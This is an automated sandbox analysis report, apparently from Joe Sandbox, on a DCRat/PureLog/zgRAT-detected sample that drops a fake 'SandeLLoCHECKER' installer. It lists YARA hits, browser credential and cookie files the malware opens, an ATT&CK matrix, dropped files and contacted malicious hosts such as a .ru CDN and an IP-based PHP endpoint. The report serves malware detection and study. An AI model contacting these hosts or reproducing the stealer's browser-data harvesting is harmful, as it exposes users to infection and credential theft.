                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.00000000034E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.0000000003277000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000024.00000002.2899943903.0000000003661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000002.1853703523.0000000012EE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: webDriverintoDll.exe PID: 7364, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: KAdpNCgonFhCnlBRasdZerWl.exe PID: 8028, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1654559691.0000000002BD3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1656268229.00000000051CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000001.00000003.1655715436.000000000688F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000000B.00000000.1775306001.00000000004E2000.00000002.00000001.01000000.00000015.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000000.1648785828.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: gorkmTnChA.exe, type: SAMPLE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.5218700.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 11.0.webDriverintoDll.exe.4e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 1.3.DCRatBuild.exe.68dd700.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.gorkmTnChA.exe.2c2170f.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.45797b.3.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.400000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.0.gorkmTnChA.exe.409294.2.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\Favorites\ApplicationFrameHost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe, type: DROPPED

                                    Mitre Att&ck Matrix

                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting                                    		1
                                    Replication Through Removable Media                                    		241
                                    Windows Management Instrumentation                                    		11
                                    Scripting                                    		1
                                    DLL Side-Loading                                    		1
                                    Disable or Modify Tools                                    		1
                                    OS Credential Dumping                                    		1
                                    System Time Discovery                                    		Remote Services11
                                    Archive Collected Data                                    		1
                                    Ingress Tool Transfer                                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts1
                                    Native API                                    		1
                                    DLL Side-Loading                                    		13
                                    Process Injection                                    		11
                                    Deobfuscate/Decode Files or Information                                    		LSASS Memory11
                                    Peripheral Device Discovery                                    		Remote Desktop Protocol1
                                    Data from Local System                                    		11
                                    Encrypted Channel                                    		Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts12
                                    Command and Scripting Interpreter                                    		1
                                    Scheduled Task/Job                                    		1
                                    Scheduled Task/Job                                    		3
                                    Obfuscated Files or Information                                    		Security Account Manager1
                                    Account Discovery                                    		SMB/Windows Admin Shares1
                                    Clipboard Data                                    		3
                                    Non-Application Layer Protocol                                    		Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Scheduled Task/Job                                    		Login HookLogin Hook11
                                    Software Packing                                    		NTDS3
                                    File and Directory Discovery                                    		Distributed Component Object ModelInput Capture14
                                    Application Layer Protocol                                    		Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Timestomp                                    		LSA Secrets158
                                    System Information Discovery                                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                                    DLL Side-Loading                                    		Cached Domain Credentials1
                                    Query Registry                                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
                                    Masquerading                                    		DCSync371
                                    Security Software Discovery                                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
                                    Virtualization/Sandbox Evasion                                    		Proc Filesystem2
                                    Process Discovery                                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt13
                                    Process Injection                                    		/etc/passwd and /etc/shadow251
                                    Virtualization/Sandbox Evasion                                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                                    Application Window Discovery                                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                                    System Owner/User Discovery                                    		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                    Behavior Graph

                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570976 Sample: gorkmTnChA.exe Startdate: 08/12/2024 Architecture: WINDOWS Score: 100 102 cdn.semkrill.ru 2->102 112 Suricata IDS alerts for network traffic 2->112 114 Found malware configuration 2->114 116 Antivirus detection for dropped file 2->116 118 12 other signatures 2->118 12 gorkmTnChA.exe 3 2->12         started        15 KAdpNCgonFhCnlBRasdZerWl.exe 2->15         started        19 msiexec.exe 2->19         started        21 KAdpNCgonFhCnlBRasdZerWl.exe 2->21         started        signatures3 process4 dnsIp5 90 C:\Users\...\SandeLLoCHECKER_Installer.exe, PE32 12->90 dropped 92 C:\Users\user\AppData\...\DCRatBuild.exe, PE32 12->92 dropped 23 DCRatBuild.exe 3 6 12->23         started        27 SandeLLoCHECKER_Installer.exe 46 12->27         started        106 185.246.67.73, 49743, 49744, 49745 THEFIRST-ASRU Russian Federation 15->106 94 C:\Users\user\Desktop\zbqSUreo.log, PE32 15->94 dropped 96 C:\Users\user\Desktop\vlAbNuev.log, PE32 15->96 dropped 98 C:\Users\user\Desktop\vSFbtVsB.log, PE32 15->98 dropped 100 15 other malicious files 15->100 dropped 108 Tries to harvest and steal browser information (history, passwords, etc) 15->108 30 msiexec.exe 19->30         started        32 msiexec.exe 19->32         started        file6 signatures7 process8 dnsIp9 72 C:\...\webDriverintoDll.exe, PE32 23->72 dropped 120 Antivirus detection for dropped file 23->120 122 Multi AV Scanner detection for dropped file 23->122 124 Machine Learning detection for dropped file 23->124 34 wscript.exe 1 23->34         started        104 cdn.semkrill.ru 172.67.184.109, 443, 49730 CLOUDFLARENETUS United States 27->104 74 C:\Users\user\AppData\Local\...\MSI47C9.tmp, PE32 27->74 dropped 76 C:\Users\user\AppData\Local\...\MSI46ED.tmp, PE32 27->76 dropped 78 C:\Users\user\AppData\Local\...\MSI44B9.tmp, PE32 27->78 dropped 80 5 other files (4 malicious) 27->80 dropped 37 msiexec.exe 11 27->37         started        file10 signatures11 process12 file13 110 Windows Scripting host queries suspicious COM object (likely to drop second stage) 34->110 40 cmd.exe 1 34->40         started        64 C:\Users\user\AppData\Local\...\MSI4DD5.tmp, PE32 37->64 dropped 66 C:\Users\user\AppData\Local\...\MSI4DB5.tmp, PE32 37->66 dropped 68 C:\Users\user\AppData\Local\...\MSI4D85.tmp, PE32 37->68 dropped 70 5 other malicious files 37->70 dropped signatures14 process15 process16 42 webDriverintoDll.exe 3 34 40->42         started        46 conhost.exe 40->46         started        file17 82 C:\...\KAdpNCgonFhCnlBRasdZerWl.exe, PE32 42->82 dropped 84 C:\Users\user\Desktop\yYksYVbT.log, PE32 42->84 dropped 86 C:\Users\user\Desktop\xqfrsuNN.log, PE32 42->86 dropped 88 21 other malicious files 42->88 dropped 126 Multi AV Scanner detection for dropped file 42->126 128 Uses schtasks.exe or at.exe to add and modify task schedules 42->128 130 Creates processes via WMI 42->130 48 cmd.exe 42->48         started        50 schtasks.exe 42->50         started        52 schtasks.exe 42->52         started        54 13 other processes 42->54 signatures18 process19 process20 56 conhost.exe 48->56         started        58 chcp.com 48->58         started        60 w32tm.exe 48->60         started        62 KAdpNCgonFhCnlBRasdZerWl.exe 48->62         started       

                                    Screenshots

                                    Thumbnails

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand

                                    Antivirus, Machine Learning and Genetic Malware Detection

                                    Initial Sample

                                    SourceDetectionScannerLabelLink
                                    gorkmTnChA.exe100%ReversingLabsWin32.Trojan.DCRat
                                    gorkmTnChA.exe100%AviraVBS/Runner.VPG
                                    gorkmTnChA.exe100%AviraVBS/Runner.VPG
                                    gorkmTnChA.exe100%AviraTR/Redcap.apero
                                    gorkmTnChA.exe100%AviraHEUR/AGEN.1323342
                                    gorkmTnChA.exe100%Joe Sandbox ML

                                    Dropped Files

                                    SourceDetectionScannerLabelLink
                                    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%AviraVBS/Runner.VPG
                                    C:\Users\Default\Favorites\ApplicationFrameHost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\BXyiPEuJ.log100%AviraHEUR/AGEN.1300079
                                    C:\Users\user\Desktop\ClgJzaDG.log100%AviraHEUR/AGEN.1362695
                                    C:\Users\user\AppData\Local\Temp\uMu0Nxwczl.bat100%AviraBAT/Delbat.C
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe100%AviraTR/Redcap.apero
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe100%Joe Sandbox ML
                                    C:\Users\Default\Favorites\ApplicationFrameHost.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\BXyiPEuJ.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\ClgJzaDG.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%Joe Sandbox ML
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\AOGsABiv.log100%Joe Sandbox ML
                                    C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Program Files\Uninstall Information\KAdpNCgonFhCnlBRasdZerWl.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Program Files\Windows NT\Accessories\en-GB\KAdpNCgonFhCnlBRasdZerWl.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Users\Default\Favorites\ApplicationFrameHost.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\ShortcutFlags.dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6036\lzmaextractor.dll0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe63%ReversingLabsWin32.Trojan.DCRat
                                    C:\Users\user\AppData\Local\Temp\MSI43FC.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI447A.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI44B9.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI46ED.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI47C9.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4969.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4A36.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4A94.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4B03.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4C8A.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4D85.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4DB5.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\MSI4DD5.tmp0%ReversingLabs
                                    C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe50%ReversingLabsWin32.Trojan.Malgent
                                    C:\Users\user\AppData\Local\Temp\shi436E.tmp0%ReversingLabs
                                    C:\Users\user\Desktop\AOGsABiv.log16%ReversingLabs
                                    C:\Users\user\Desktop\BXyiPEuJ.log25%ReversingLabs
                                    C:\Users\user\Desktop\ClgJzaDG.log17%ReversingLabs
                                    C:\Users\user\Desktop\GKQhrBJx.log25%ReversingLabs
                                    C:\Users\user\Desktop\JrPikvxc.log25%ReversingLabs
                                    C:\Users\user\Desktop\LMwQZDoR.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\MAAYLQkP.log21%ReversingLabs
                                    C:\Users\user\Desktop\OWmHElNj.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\OfhhMrNQ.log25%ReversingLabs
                                    C:\Users\user\Desktop\SEFybwug.log17%ReversingLabs
                                    C:\Users\user\Desktop\SFtfhzmX.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                                    C:\Users\user\Desktop\UplOiJFY.log8%ReversingLabs
                                    C:\Users\user\Desktop\UvPgJftz.log29%ReversingLabs
                                    C:\Users\user\Desktop\XaQepXPR.log16%ReversingLabs
                                    C:\Users\user\Desktop\XgvwQtEs.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\YTLXwDIz.log8%ReversingLabs
                                    C:\Users\user\Desktop\ZkmfqpvS.log25%ReversingLabs
                                    C:\Users\user\Desktop\aHPfiQDx.log21%ReversingLabs
                                    C:\Users\user\Desktop\dYYVtYJg.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\gaqNoVOB.log5%ReversingLabs
                                    C:\Users\user\Desktop\hwUMgwXg.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\jLWdviZu.log4%ReversingLabs
                                    C:\Users\user\Desktop\jUtdfVsr.log8%ReversingLabs
                                    C:\Users\user\Desktop\jyGvCfcb.log25%ReversingLabs
                                    C:\Users\user\Desktop\lKQdHBzT.log17%ReversingLabs
                                    C:\Users\user\Desktop\lNILRSep.log21%ReversingLabs
                                    C:\Users\user\Desktop\lealJKxT.log17%ReversingLabs
                                    C:\Users\user\Desktop\nBMUCfZn.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\pAGUOyAM.log5%ReversingLabs
                                    C:\Users\user\Desktop\uAoBkxMT.log29%ReversingLabs
                                    C:\Users\user\Desktop\vSFbtVsB.log4%ReversingLabs
                                    C:\Users\user\Desktop\vlAbNuev.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\wKKCkQsU.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\xqfrsuNN.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                                    C:\Users\user\Desktop\yYksYVbT.log21%ReversingLabs
                                    C:\Users\user\Desktop\zbqSUreo.log8%ReversingLabs
                                    C:\bridgeMonitorDhcpCommon\KAdpNCgonFhCnlBRasdZerWl.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
                                    C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe63%ReversingLabsByteCode-MSIL.Trojan.Jalapeno

                                    Unpacked PE Files

                                    No Antivirus matches

                                    Domains

                                    No Antivirus matches

                                    URLs

                                    SourceDetectionScannerLabelLink
                                    http://185.246.67.73d0%Avira URL Cloudsafe
                                    https://discord.semkrill.ru/=0%Avira URL Cloudsafe
                                    https://semkrill.ru/contact(5h0%Avira URL Cloudsafe
                                    https://semkrill.ru/contact(0%Avira URL Cloudsafe
                                    https://discord.semkrill.ru/0%Avira URL Cloudsafe
                                    http://185.246.67.730%Avira URL Cloudsafe
                                    http://185.246H0%Avira URL Cloudsafe
                                    https://semkrill.ru/supporth1h0%Avira URL Cloudsafe
                                    https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4p0%Avira URL Cloudsafe
                                    https://discord.semkrill.ru/AI_CLEAN_RESOURCES_USER_PROMPT_BASIC_UI0AI_APP_FILE0%Avira URL Cloudsafe
                                    https://semkrill.ru/supportAI_SHORTCUTTABLE_FLAGSCOLUMNAQAAAA8AAABTAGEAbgBkAGUATABMAG8AQwBIAEUAQwBLA0%Avira URL Cloudsafe
                                    https://semkrill.ru/support0%Avira URL Cloudsafe
                                    https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z0%Avira URL Cloudsafe
                                    https://sandello.ru0%Avira URL Cloudsafe
                                    https://semkrill.ru/contact0%Avira URL Cloudsafe
                                    https://discord.semkrill.ru/h0%Avira URL Cloudsafe
                                    https://semkrill.ru/contactWindowsTypeNT40DisplayWindows0%Avira URL Cloudsafe
                                    https://semkrill.ru/supporthPh0%Avira URL Cloudsafe
                                    https://semkrill.ru/supportEY0%Avira URL Cloudsafe
                                    https://discord.semkrill.ru/g0%Avira URL Cloudsafe
                                    http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.php0%Avira URL Cloudsafe
                                    http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdat0%Avira URL Cloudsafe
                                    https://cdn.semkrill.ru/0%Avira URL Cloudsafe

                                    Domains and IPs

                                    Contacted Domains

                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    cdn.semkrill.ru
                                    		172.67.184.109
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7ztrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://185.246.67.73/Uploads/server9/universalUploads/Trafficcentraldatalife/phplow3/trackMultiupdatePacket/Javascript3lowpython/db/ProtonBigloadApiline/5flowertrackJs/VoiddbProtect/1Temptraffic/TrackDatalife0/auth/JsToProton/uploads6centralLinux/Providerto_packetLowServerbaseDownloads.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                        		high
                                        http://www.fontbureau.com/designersGKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://duckduckgo.com/ac/?q=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                            		high
                                            http://www.fontbureau.com/designers/?KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/bTheKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designers?KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://185.246.67.73dKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2899943903.0000000003427000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://discord.semkrill.ru/=SandeLLoCHECKER_Installer.exe, 00000003.00000002.2900625714.0000000004D00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tiro.comKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://semkrill.ru/contact(5hSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                      		high
                                                      http://www.fontbureau.com/designersKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.goodfont.co.krKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://cdn.semkrill.ru/checker/release/update/SandeLLoCHECKER_Installer-FILES.7z4pSandeLLoCHECKER_Installer.exe, 00000003.00000002.2895703054.0000000000D9A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.sajatypeworks.comKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.typography.netDKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.galapagosdesign.com/staff/dennis.htmKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2945964352.000000001FA02000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://discord.semkrill.ru/AI_CLEAN_RESOURCES_USER_PROMPT_BASIC_UI0AI_APP_FILESandeLLoCHECKER_Installer.msi.3.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://semkrill.ru/contact(SandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://semkrill.ru/supporth1hSandeLLoCHECKER_Installer.exe, 00000003.00000002.2905936308.000000000B669000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchKAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013718000.00000004.00000800.00020000.00000000.sdmp, KAdpNCgonFhCnlBRasdZerWl.exe, 00000024.00000002.2922369928.0000000013664000.00000004.00000800.00020000.00000000.sdmp, KUA0FEd33u.36.drfalse
                                                                    		high
